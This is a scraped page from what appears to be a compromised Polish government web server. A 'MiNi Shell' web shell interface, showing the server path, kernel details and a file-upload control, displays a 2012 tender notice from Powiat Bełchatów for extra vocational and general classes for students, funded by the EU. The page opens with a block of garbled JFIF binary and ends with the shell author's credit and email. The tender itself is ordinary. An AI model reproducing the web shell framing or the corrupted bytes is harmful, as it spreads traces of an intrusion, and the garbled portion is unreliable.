JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120126/24974-N-2012.html

<p class="kh_header"><b>Bełchatów: Realizacja zajęć dodatkowych dla uczniów ZSP nr 3, ZSP nr 4 i SOSW w Bełchatowie, w związku z realizacją projektu Profesjonalnie przygotowani uczniowie szkół zawodowych- kluczem wejścia na lokalny rynek pracy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 24974 - 2012; data zamieszczenia: 26.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-belchatowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zajęć dodatkowych dla uczniów ZSP nr 3, ZSP nr 4 i SOSW w Bełchatowie, w związku z realizacją projektu Profesjonalnie przygotowani uczniowie szkół zawodowych- kluczem wejścia na lokalny rynek pracy współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach realizacji zajęć dodatkowych przeprowadzonych będzie 6 656 godzin lekcyjnych, w tym:
1) zajęcia zawodowe- po 180 h:
a) dla uczniów ZSP nr 3:
-budownictwo
-elektronika
-elektryka
-mechanika
-górnictwo odkrywkowe
-informatyka
-teleinformatyka
b) dla uczniów ZSP nr 4:
-hotelarstwo
-ekonomia
-fryzjerstwo
-żywienie i gosp. domowe
-logistyka
c) dla uczniów SOSW:
- żywienie i gosp. domowe
-komputerowy skład tekstu z elementami AUTO CAD.
W ramach zajęć z budownictwa, elektryki i mechaniki winny być realizowane m.in. zagadnienia dotyczące wdrażania i instalacji technologii ograniczających emisję CO2 oraz w ramach budownictwa zagadnienia dotyczące Budownictwa Naturalnego (zgodnie z celami określonymi 
w strategii Europa 2020). 
2) zajęcia ogólne- po 180 h w każdej szkole (ZSP Nr 3, ZSP Nr 4 i SOSW):
-jęz. polski,
-jęz. niemiecki (z wyłączeniem SOSW),
-jęz. angielski,
-matematyka,
-przedsiębiorczość,
-zajęcia sportowe.
Celem ww zajęć jest przygotowanie uczniów do egzaminów potwierdzających kwalifikacje zawodowe oraz rozwijanie u nich następujących kompetencji kluczowych:
-porozumiewanie się w jęz. ojczystym i obcym,
-matematyczne i podstawowe kompetencje naukowo-techniczne,
-informatyczne,
-umiejętność uczenia się,
-inicjatywność i przedsiębiorczość.
3) szkolenie z Zasady równości płci- każda grupa na początku projektu musi przejść 2 h tego rodzaju zajęć. Łącznie 56 h. Ich celem jest:
-zdobycie wiedzy na temat uprzedzeń, stereotypów i przepisów prawa związanych z równością płci i przeciwdziałaniem dyskryminacji,
-przyjrzenie się własnej postawie oraz zdobycie umiejętności jej oceny ,
-nabycie właściwych nawyków i postaw w w/w temacie.
Zajęcia winny być prowadzone w formie warsztatowej.
Należy zaznaczyć, że 1 h zajęć będzie wspólna dla uczniów i uczennic, natomiast druga, ze względu na stwierdzoną w szkołach dyskryminację płci, przeznaczona ma być dla samych uczennic tak, by otrzymały one potrzebną im wiedzę i wsparcie psychologiczne, dzięki czemu wyrównały szansę w wybranym przez nie życiu społecznym i zawodowym. 
4) doradztwo zawodowe-  w ramach projektu dla każdej grupy muszą odbywać się również zajęcia z doradcą zawodowym- 1 h w miesiącu (łącznie 1 200 h). Zajęcia takie mają pomóc BO w zdobyciu wiedzy w zakresie własnych predyspozycji zawodowych, przyjęciu odpowiednich postaw oraz zrozumieniu otoczenia.
Każde zajęcia powinny być prowadzone metodami tzw. aktywnymi (np. warsztaty, burza mózgów, dyskusja, gry dyd., elementy dramy, praca w małych gr. itp.). Na zajęciach powinny być stosowane różnorodne formy zajęć (zbiorowa, grupowa i indywidualna) w zależności od potrzeb zajęć 
i uczniów. W przypadku zgłoszenia przez uczennice problemów w rozumieniu zagadnień technicznych na zajęciach zawodowych, kolejna godz. zajęć po zaistnieniu problemu, musi zostać przeprowadzana tylko dla nich. W ten sposób będą one lepiej poruszały się w zagadnieniach technicznych.
Na początku i na końcu każdego semestru powinny zostać przeprowadzone sprawdziany, które będą miały na celu zweryfikowanie postępów w nauce. Ich wyniki należy każdorazowo przedstawiać w formie pisemnej Zamawiającemu.
Zajęcia realizowane będą od II sem. roku szk. 2011-2012 do VI 13 (z przerwami na ferie letnie 
i zimowe). Na każdy przedmiot uczęszczać będzie po 30 uczniów w danej szkole podzielonych na 3 grupy (z wyjątkiem SOSW). W SOSW ze względu na specyficzny charakter placówki (uczniowie niepełnosprawni) 40 BO będzie podzielonych na 7 grup przedmiotowych. Istnieje możliwość dokonania zmian w w/w proporcjach w przypadku wystąpienia takiej konieczności. Wskazana powyżej ogólna liczba godzin w ilości 6 656 stanowi jednak obowiązkową i niezmienialną liczbę godzin lekcyjnych konieczną do zrealizowania w ramach niniejszego zamówienia. 
Praktyki zawodowe- łącznie 11 250 h:
W ramach podpisanego w dniu 13.11.08 r. pomiędzy powiatem a RIG w Beł., FRG Zelów, ARR ARREKS S.A., BKPPT Sp. z o.o. i Stowarzyszeniem na rzecz Zrównoważonego Rozwoju Gminy Kleszczów Porozumienia, uczniowie biorący udział z zajęciach zawodowych (tj. 375 os.), będą kierowani na praktyki do powyższych instytucji lub zrzeszonych w nich firm lub innych przedsiębiorstw. Każdy z nich odbędzie w ten sposób 10 h praktyk w semestrze. Zgodnie z przepisami, pomiędzy każdym BO a pracodawcą przyjmującym go na praktykę, zostanie podpisana stosowna umowa. Za przyjęcie i odbywanie praktyk pracodawca nie będzie jednak otrzymywał żadnego wynagrodzenia. Obowiązkiem Zamawiającego będzie podpisaniu w/w umów. Do obowiązków Wykonawcy należało będzie koordynowanie przebiegu praktyk i rozliczanie z nich uczniów.
Zajęcia będą się odbywały w pomieszczeniach ZSP  nr 3, ZSP nr 4 i SOSW w Bełchatowie, zaraz po zajęciach lekcyjnych i w sposób nie kolidujący z nimi. W przypadku, gdy zachodzić będzie taka konieczność, dopuszcza się prowadzenie zajęć w innym miejscu niż siedziba danej szkoły oraz w dni wolne od pracy tj. w soboty lub niedziele.
Liczba Beneficjentów Ostatecznych biorących udział w zajęciach to 760 uczniów ZSP nr 3, ZSP nr 4 i SOSW. Za nabór BO do projektu odpowiadać będzie Zamawiający. Liczebność grup może ulec zwiększeniu jedynie w uzasadnionych przypadkach i po akceptacji Zamawiającego. Wskazana ogólna liczba BO projektu może ulec zmianie ze względu na planowaną rekrutację oraz zdarzenia losowe niemożliwe do przewidzenia. Jeżeli ostateczna liczba uczniów po przeprowadzonej rekrutacji ulegnie zwiększeniu nie wpłynie to na zwiększenie ogólnej liczby godzin zajęć do zrealizowania, ani na zwiększenie wynagrodzenia.
W programie każdych zajęć należy uwzględnić wszystkie cele edukacyjne, treści nauczania 
i umiejętności określone w podstawie programowej. Należy uwzględnić nie tylko powtarzanie 
i scalanie wiedzy przekazanej uczniom na zajęciach szkolnych, ale również dać im możliwość przyswojenia nowych wiadomości i nabycie nowych umiejętności na poziomie dostosowanym do ich potrzeb, możliwości i oczekiwań. 
Zajęcia powinny być prowadzone przez wyspecjalizowanych nauczycieli mających:
1) kwalifikacje do prowadzenia danych zajęć zgodne z aktualnym Rozporządzeniem Ministra Edukacji Narodowej i Sportu w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenie lub ukończonego zakładu kształcenia nauczycieli,
2) doświadczenie w pracy z młodzieżą szkół ponadgimnazjalnych, przy czym przez doświadczenie rozumie się co najmniej 5-letni staż pracy w tych klasach.
Wykonawca winien zapewnić:
1) dla poszczególnych zajęć informacje dotyczące realizowanego programu z uwzględnieniem:
a) celów zajęć,
b) form i metod pracy,
c) środków dydaktycznych,
d) zakresów treści,
e) ramowych planów zajęć,
f) efektów zajęć,
g) ewaluacji;
2) nauczycieli z odpowiednimi kwalifikacjami i doświadczeniem,
3) szczegółowy plan zajęć,
4) niezbędne materiały biurowe i pomoce dydaktyczne, w tym np. niezbędne produkty spożywcze na zajęcia, itp.,
5) zatrudnianym przez siebie nauczycielom możliwość przygotowywania niezbędnych materiałów dydaktycznych, w tym kserowanie kart pracy, sprawdzianów itp.,
6) prowadzenie dokumentacji projektu zgodnie z wytycznymi przekazanymi przez Zleceniodawcę,
7) prawo wglądu do dokumentów Wykonawcy związanych z realizacją Projektu, w tym dokumentów finansowych,
8) obsługę biurową realizowanej usługi (np. sekretarkę),
9) osobę koordynującą przebieg realizacji usługi oraz pozostającą do kontaktu w sprawach związanych z realizacją zamówienia,
10)  ciągłą promocję projektu prowadzoną zgodnie z aktualnymi wytycznymi dotyczącymi promocji projektów finansowanych ze środków EFS..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli Wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty).
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, iż wykonywał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na realizacji zajęć dla uczniów szkół ponadgimnazjalnych, o wartości każdej z nich odpowiadającej co najmniej wartości 300.000,00 zł, oraz, że usługi te zostały wykonane lub są wykonywane należycie.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.
Ww. warunek zostanie uznany za spełniony jeżeli Wykonawca złoży oświadczenie z art. 44 P.z.p. (Załącznik nr 1 do formularza oferty) oraz wykaz usług wg wzoru stanowiącego Załącznik nr 3 do formularza oferty wraz z dokumentami potwierdzającymi, że usługi te zostały należycie wykonane (np. referencje).
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie uznany za spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 1 do formularza oferty). 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt V.1-V.4 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy -  z wykorzystaniem wzoru określonego w niniejszej SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana istotnych postanowień zawartej Umowy po jej zawarciu  w stosunku do treści oferty złożonej przez Wykonawcę jest dopuszczalna przy zachowaniu następujących warunków:
1) przedmiotu zamówienia, pod warunkiem, że będą one na korzyść Zamawiającego albo zaszły okoliczności których nie można było przewidzieć w chwili zawarcia Umowy, 
2)  terminu wykonania umowy,  pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarci umowy, 
3) wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla Zamawiającego lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu zamówienia.
4) Zamawiający postanowił zmienić zakres realizowanego zamówienia bądź inne postanowienia Umowy ze względu na nowe okoliczności, o których nie wiedział zawierając Umowę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.e-bip.pl/start/46  / Zamówienia publiczne 2012<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bełchatowie, Wydział Promocji i Rozwoju Powiatu, ul. Czapliniecka 96, pok. 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Bełchatowie, ul. Pabianicka 17/19, 97-400 Bełchatów, sekretariat, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków 
Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com